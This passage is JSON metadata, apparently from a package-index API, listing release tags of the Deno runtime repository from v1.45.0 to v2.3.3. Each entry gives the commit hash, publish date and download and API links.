3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ec